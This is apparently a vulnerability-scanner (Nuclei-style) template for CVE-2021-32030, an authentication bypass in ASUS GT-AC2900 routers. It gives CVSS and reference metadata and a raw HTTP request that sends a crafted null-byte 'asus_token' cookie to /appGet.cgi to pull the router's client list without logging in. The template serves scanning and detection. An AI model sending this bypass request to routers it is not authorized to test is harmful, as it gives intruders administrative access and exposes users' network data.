id: CVE-2021-32030 info: name: ASUS GT-AC2900 - Authentication Bypass author: gy741 severity: critical description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations." reference: - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass - https://nvd.nist.gov/vuln/detail/CVE-2021-32030 - https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md - https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-32030 cwe-id: CWE-287 tags: cve,cve2021,asus,auth-bypass,router requests: - raw: - | GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 Host: {{Hostname}} User-Agent: asusrouter-- Referer: {{BaseURL}} Cookie: asus_token=\0Invalid; clickedItem_tab=0 matchers-condition: and matchers: - type: status status: - 200 - type: word part: header words: - application/json - type: word words: - "get_cfg_clientlist" - "alias" - "model_name" condition: and # Enhanced by mp on 2022/04/22